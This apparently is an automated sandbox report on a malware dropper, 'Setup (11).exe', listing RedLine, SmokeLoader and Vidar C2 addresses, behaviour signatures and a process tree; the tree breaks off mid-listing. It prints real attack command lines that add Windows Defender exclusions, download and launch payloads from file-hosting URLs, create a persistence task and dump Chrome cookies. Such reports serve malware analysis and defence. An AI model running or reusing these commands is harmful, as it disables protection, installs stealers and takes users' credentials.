Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    735s
  • max time network
    1793s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-08-2021 10:21

General

  • Target

    Setup (11).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bc6269f31h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120bcfeb5393h?raw

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://dl.uploadgram.me/6120c8f91373ch?raw

Extracted

Family

redline

Botnet

Second_7.5K

C2

45.14.49.200:27625

Extracted

Family

redline

Botnet

www

C2

185.204.109.146:54891

Extracted

Family

redline

Botnet

dibild

C2

135.148.139.222:33569

Extracted

Family

redline

Botnet

@Gerhdhd

C2

46.8.19.177:41228

Extracted

Family

redline

Botnet

20_8_rs

C2

jekorikani.xyz:80

Extracted

Family

redline

Botnet

19.08

C2

95.181.172.100:6795

Extracted

Family

smokeloader

Version

2020

C2

http://aucmoney.com/upload/

http://thegymmum.com/upload/

http://atvcampingtrips.com/upload/

http://kuapakualaman.com/upload/

http://renatazarazua.com/upload/

http://nasufmutlu.com/upload/

rc4.i32
rc4.i32

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 12 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Suspicious use of NtCreateProcessExOtherParentProcess 4 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Nirsoft 2 IoCs
  • Vidar Stealer 2 IoCs
  • Blocklisted process makes network request 18 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 7 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 21 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 20 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 35 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 36 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious behavior: SetClipboardViewer 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
    • Suspicious use of SetThreadContext
    PID:2856
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:5428
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2748
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2736
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2564
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2488
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1852
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1412
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1364
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1052
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                        PID:912
                        • C:\Users\Admin\AppData\Roaming\cfcjjbr
                          C:\Users\Admin\AppData\Roaming\cfcjjbr
                          2⤵
                            PID:8324
                          • C:\Users\Admin\AppData\Roaming\cfcjjbr
                            C:\Users\Admin\AppData\Roaming\cfcjjbr
                            2⤵
                              PID:9212
                          • C:\Users\Admin\AppData\Local\Temp\Setup (11).exe
                            "C:\Users\Admin\AppData\Local\Temp\Setup (11).exe"
                            1⤵
                            • Checks computer location settings
                            • Modifies system certificate store
                            • Suspicious behavior: EnumeratesProcesses
                            • Suspicious use of WriteProcessMemory
                            PID:4656
                            • C:\Users\Admin\Documents\uxmDHmWKdj1I3ARdHjOtFOsl.exe
                              "C:\Users\Admin\Documents\uxmDHmWKdj1I3ARdHjOtFOsl.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1108
                            • C:\Users\Admin\Documents\kO0JYMwookxPNAyc65N_LlTT.exe
                              "C:\Users\Admin\Documents\kO0JYMwookxPNAyc65N_LlTT.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1076
                              • C:\Users\Admin\Documents\kO0JYMwookxPNAyc65N_LlTT.exe
                                C:\Users\Admin\Documents\kO0JYMwookxPNAyc65N_LlTT.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4672
                            • C:\Users\Admin\Documents\s67uFPuL6l69xIyVfwMWlrau.exe
                              "C:\Users\Admin\Documents\s67uFPuL6l69xIyVfwMWlrau.exe"
                              2⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:1384
                              • C:\Users\Admin\Documents\s67uFPuL6l69xIyVfwMWlrau.exe
                                C:\Users\Admin\Documents\s67uFPuL6l69xIyVfwMWlrau.exe
                                3⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2432
                            • C:\Users\Admin\Documents\TSRCLeg0sxqFHHm7zlltkfIM.exe
                              "C:\Users\Admin\Documents\TSRCLeg0sxqFHHm7zlltkfIM.exe"
                              2⤵
                              • Executes dropped EXE
                              PID:1420
                            • C:\Users\Admin\Documents\47j6lUPFowHjHScuGVvYSXuL.exe
                              "C:\Users\Admin\Documents\47j6lUPFowHjHScuGVvYSXuL.exe"
                              2⤵
                                PID:1480
                              • C:\Users\Admin\Documents\ZJpKti6aLgXE22fXOB1vy2W4.exe
                                "C:\Users\Admin\Documents\ZJpKti6aLgXE22fXOB1vy2W4.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2008
                                • C:\Users\Admin\Documents\ZJpKti6aLgXE22fXOB1vy2W4.exe
                                  C:\Users\Admin\Documents\ZJpKti6aLgXE22fXOB1vy2W4.exe
                                  3⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:576
                              • C:\Users\Admin\Documents\SaWKTrLVEAqFpKISfUqjbhI5.exe
                                "C:\Users\Admin\Documents\SaWKTrLVEAqFpKISfUqjbhI5.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks BIOS information in registry
                                • Checks whether UAC is enabled
                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1776
                              • C:\Users\Admin\Documents\snB7t4jszyl4mvMoIvFgHRPt.exe
                                "C:\Users\Admin\Documents\snB7t4jszyl4mvMoIvFgHRPt.exe"
                                2⤵
                                • Executes dropped EXE
                                PID:2304
                                • C:\Users\Admin\Documents\snB7t4jszyl4mvMoIvFgHRPt.exe
                                  "C:\Users\Admin\Documents\snB7t4jszyl4mvMoIvFgHRPt.exe"
                                  3⤵
                                    PID:7796
                                • C:\Users\Admin\Documents\PgWwkJqL_VppKMdafkaTFkpt.exe
                                  "C:\Users\Admin\Documents\PgWwkJqL_VppKMdafkaTFkpt.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:2600
                                  • C:\Users\Admin\Documents\PgWwkJqL_VppKMdafkaTFkpt.exe
                                    C:\Users\Admin\Documents\PgWwkJqL_VppKMdafkaTFkpt.exe
                                    3⤵
                                    • Executes dropped EXE
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1112
                                • C:\Users\Admin\Documents\j6EKzGlEIMxdH1IXJVo6RUSd.exe
                                  "C:\Users\Admin\Documents\j6EKzGlEIMxdH1IXJVo6RUSd.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2820
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                    3⤵
                                      PID:4688
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                        4⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2704
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                        4⤵
                                          PID:564
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                          4⤵
                                            PID:8332
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                            4⤵
                                              PID:8492
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                              4⤵
                                                PID:6932
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                4⤵
                                                  PID:2364
                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                  4⤵
                                                    PID:6772
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                    4⤵
                                                      PID:4432
                                                      • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                        5⤵
                                                          PID:4896
                                                          • C:\Windows\SYSTEM32\cmd.exe
                                                            "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                            6⤵
                                                              PID:756
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                7⤵
                                                                  PID:7880
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                6⤵
                                                                  PID:7684
                                                                  • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                    7⤵
                                                                      PID:8084
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                        8⤵
                                                                          PID:8348
                                                                          • C:\Windows\system32\schtasks.exe
                                                                            schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                            9⤵
                                                                            • Creates scheduled task(s)
                                                                            PID:2004
                                                                        • C:\Windows\system32\services32.exe
                                                                          "C:\Windows\system32\services32.exe"
                                                                          8⤵
                                                                            PID:8728
                                                                            • C:\Windows\system32\cmd.exe
                                                                              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                              9⤵
                                                                                PID:4076
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                  10⤵
                                                                                    PID:8528
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                                                                                  9⤵
                                                                                    PID:4452
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                                                                                  8⤵
                                                                                    PID:9184
                                                                                    • C:\Windows\system32\choice.exe
                                                                                      choice /C Y /N /D Y /T 3
                                                                                      9⤵
                                                                                        PID:8552
                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                              4⤵
                                                                                PID:3476
                                                                                • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                  5⤵
                                                                                    PID:936
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                  4⤵
                                                                                    PID:4572
                                                                                    • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                      5⤵
                                                                                        PID:8936
                                                                                        • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                          "{path}"
                                                                                          6⤵
                                                                                            PID:7024
                                                                                          • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                            "{path}"
                                                                                            6⤵
                                                                                              PID:4256
                                                                                    • C:\Users\Admin\Documents\AHGJAS7TzpUPayw0mjf_tm7Q.exe
                                                                                      "C:\Users\Admin\Documents\AHGJAS7TzpUPayw0mjf_tm7Q.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:3632
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 760
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:1060
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 784
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:1376
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 732
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:1220
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 816
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:4440
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 964
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • Program crash
                                                                                        PID:4904
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 992
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:4612
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1008
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:2816
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1408
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:5324
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1464
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:5428
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1472
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:5544
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 1688
                                                                                        3⤵
                                                                                        • Program crash
                                                                                        PID:5896
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3632 -s 916
                                                                                        3⤵
                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                        • Program crash
                                                                                        PID:5988
                                                                                    • C:\Users\Admin\Documents\Um8rUUS6N5A8jfkYc3O6zSsA.exe
                                                                                      "C:\Users\Admin\Documents\Um8rUUS6N5A8jfkYc3O6zSsA.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:4080
                                                                                    • C:\Users\Admin\Documents\heQ_tM2kvgsQ3UkcpxvMWk6i.exe
                                                                                      "C:\Users\Admin\Documents\heQ_tM2kvgsQ3UkcpxvMWk6i.exe"
                                                                                      2⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:3472
                                                                                      • C:\Users\Admin\AppData\Roaming\7939374.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\7939374.exe"
                                                                                        3⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3416
                                                                                      • C:\Users\Admin\AppData\Roaming\1902725.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\1902725.exe"
                                                                                        3⤵
                                                                                          PID:1436
                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:2692
                                                                                        • C:\Users\Admin\AppData\Roaming\8899737.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\8899737.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:1752
                                                                                      • C:\Users\Admin\Documents\sY_Ml92NCL2u3EBe0CsnK0Do.exe
                                                                                        "C:\Users\Admin\Documents\sY_Ml92NCL2u3EBe0CsnK0Do.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        • Drops file in Program Files directory
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:4460
                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:3092
                                                                                        • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                          "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:5012
                                                                                          • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            4⤵
                                                                                              PID:736
                                                                                            • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              4⤵
                                                                                                PID:4472
                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                C:\Windows\system32\WerFault.exe -u -p 5012 -s 1544
                                                                                                4⤵
                                                                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                • Program crash
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:1420
                                                                                            • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                              3⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:4940
                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                4⤵
                                                                                                  PID:2324
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3004
                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                  4⤵
                                                                                                    PID:8864
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    4⤵
                                                                                                      PID:6508
                                                                                                • C:\Users\Admin\Documents\pBYZ17lFyXhqMtFnlm90XOgX.exe
                                                                                                  "C:\Users\Admin\Documents\pBYZ17lFyXhqMtFnlm90XOgX.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:1648
                                                                                                • C:\Users\Admin\Documents\DvIeW0UcHQ_TmUHZnuF4MVZd.exe
                                                                                                  "C:\Users\Admin\Documents\DvIeW0UcHQ_TmUHZnuF4MVZd.exe"
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:4408
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 660
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3040
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 648
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:4924
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 680
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4968
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 660
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3068
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 1120
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:1084
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 1160
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    PID:1376
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 1116
                                                                                                    3⤵
                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                    • Program crash
                                                                                                    PID:4396
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4408 -s 1164
                                                                                                    3⤵
                                                                                                    • Program crash
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:412
                                                                                                • C:\Users\Admin\Documents\azqYMVlDgqKO5WHlsTZe8jCm.exe
